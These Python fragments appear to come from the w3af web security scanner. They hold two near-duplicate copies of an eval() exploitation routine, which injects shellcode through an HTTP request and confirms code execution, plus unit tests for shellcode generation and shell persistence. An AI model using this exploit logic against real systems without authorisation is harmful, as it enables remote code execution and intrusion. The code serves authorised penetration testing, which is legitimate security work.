def _verify_vuln(self, vuln_obj): """ This command verifies a vuln. This is really hard work! :param vuln_obj: The vulnerability to exploit. :return : True if vuln can be exploited. """ # Get the shells extension = vuln_obj.get_url().get_extension() # I get a list of tuples with code and extension to use null_command = '' shell_code_list = shell_handler.get_shell_code(extension, null_command) for code, real_extension, shellcode_generator in shell_code_list: # Prepare for exploitation... mutant = vuln_obj.get_mutant() mutant = mutant.copy() mutant.set_token_value(code) try: http_res = self._uri_opener.send_mutant(mutant) except BaseFrameworkException, w3: msg = 'An error occurred while trying to exploit the eval()'\ ' vulnerability. Original exception: "%s".' om.out.debug(msg % w3) else: if shell_handler.SHELL_IDENTIFIER in http_res.get_body(): msg = 'Successfully exploited eval() vulnerability using'\ ' the following code snippet: "%s...".' % code[:35] om.out.debug(msg) self._shellcode_generator = shellcode_generator return True
def _verify_vuln(self, vuln_obj): """ This command verifies a vuln. This is really hard work! :param vuln_obj: The vulnerability to exploit. :return : True if vuln can be exploited. """ # Get the shells extension = vuln_obj.get_url().get_extension() # I get a list of tuples with code and extension to use null_command = '' shell_code_list = shell_handler.get_shell_code(extension, null_command) for code, real_extension, shellcode_generator in shell_code_list: # Prepare for exploitation... mutant = vuln_obj.get_mutant() mutant = mutant.copy() mutant.set_token_value(code) try: http_res = self._uri_opener.send_mutant(mutant) except BaseFrameworkException, w3: msg = 'An error occurred while trying to exploit the eval()' \ ' vulnerability. Original exception: "%s".' om.out.debug(msg % w3) else: if shell_handler.SHELL_IDENTIFIER in http_res.get_body(): msg = 'Successfully exploited eval() vulnerability using' \ ' the following code snippet: "%s...".' % code[:35] om.out.debug(msg) self._shellcode_generator = shellcode_generator return True
def test_get_shell_code_invalid_extension(self): shells = get_shell_code('123456', self.TEST_CMD) self.assertEqual(len(shells), 2) php_shell_code, lang, shellcode_generator = shells[0] self.assertEqual(lang, 'php') self.assertIn('echo ', php_shell_code)
def test_get_shell_code_extension_force(self): shells = get_shell_code('php', self.TEST_CMD, True) self.assertEqual(len(shells), 1) php_shell_code, lang, shellcode_generator = shells[0] self.assertEqual(lang, 'php') self.assertIn('echo ', php_shell_code)
def test_kb_list_shells_eval_2181(self): """ :see: https://github.com/andresriancho/w3af/issues/2181 """ w3af_core = w3afCore() shellcodes = get_shell_code('php', 'ls') shellcode_generator = shellcodes[0][2] shell = EvalShell(MockVuln(), w3af_core.uri_opener, w3af_core.worker_pool, shellcode_generator) kb.append('a', 'b', shell) shells = kb.get_all_shells(w3af_core=w3af_core) self.assertEqual(len(shells), 1) unpickled_shell = shells[0] self.assertEqual(shell, unpickled_shell) self.assertIs(unpickled_shell._uri_opener, w3af_core.uri_opener) self.assertIs(unpickled_shell.worker_pool, w3af_core.worker_pool) self.assertEqual(unpickled_shell.shellcode_generator.args, shell.shellcode_generator.args) w3af_core.quit()